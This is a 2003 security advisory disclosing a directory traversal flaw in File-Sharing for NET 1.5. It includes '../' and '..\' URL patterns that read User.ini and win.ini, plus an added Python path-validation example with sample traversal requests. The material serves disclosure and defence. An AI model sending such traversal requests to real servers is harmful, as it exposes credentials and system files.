Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendor's Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a directory traversal vulnerability. Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
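
The check a file server needs before opening a requested file, shown as an added example (not the vendor's code and not part of the original advisory). WEB_ROOT and resolve_request are hypothetical names; Windows path rules are modelled with Python's ntpath module so the example runs on any platform.

```python
import ntpath
from urllib.parse import unquote

WEB_ROOT = r"C:\Shared"  # assumed published directory (hypothetical)


def resolve_request(url_path, web_root=WEB_ROOT):
    """Map a URL path to a file under web_root.

    Returns the normalized Windows path, or None when the request
    would leave the published directory.
    """
    # Decode percent-escapes once, so '%2e%2e%5c' is seen as '..\'.
    decoded = unquote(url_path)
    if "\x00" in decoded:
        return None
    # Windows accepts both separators, so '../' and '..\' are equivalent.
    relative = decoded.replace("/", "\\").lstrip("\\")
    # A colon means a drive letter (C:\...) or an alternate data stream.
    if ":" in relative:
        return None
    root = ntpath.normpath(web_root)
    # normpath collapses every '..' component before the comparison.
    candidate = ntpath.normpath(ntpath.join(root, relative))
    root_cmp = ntpath.normcase(root)
    cand_cmp = ntpath.normcase(candidate)
    # Compare against root plus a separator, so a sibling directory
    # such as C:\SharedSecrets does not pass as being inside C:\Shared.
    if cand_cmp != root_cmp and not cand_cmp.startswith(root_cmp + "\\"):
        return None
    # This is a lexical check only; a real server should also resolve
    # junctions and symlinks (os.path.realpath) before opening the file.
    return candidate


if __name__ == "__main__":
    # Constructed sample requests, including the two forms from the advisory.
    samples = [
        "/docs/report.txt",
        "/../../../windows/win.ini",
        "\\..\\..\\..\\windows\\win.ini",
        "/%2e%2e%5c%2e%2e%5cwindows%5cwin.ini",
        "/../SharedSecrets/notes.txt",
    ]
    for s in samples:
        print(f"{s!r:45} -> {resolve_request(s)}")
```
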
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@xxxxxxxxxxx
http://www.bsecurity.tk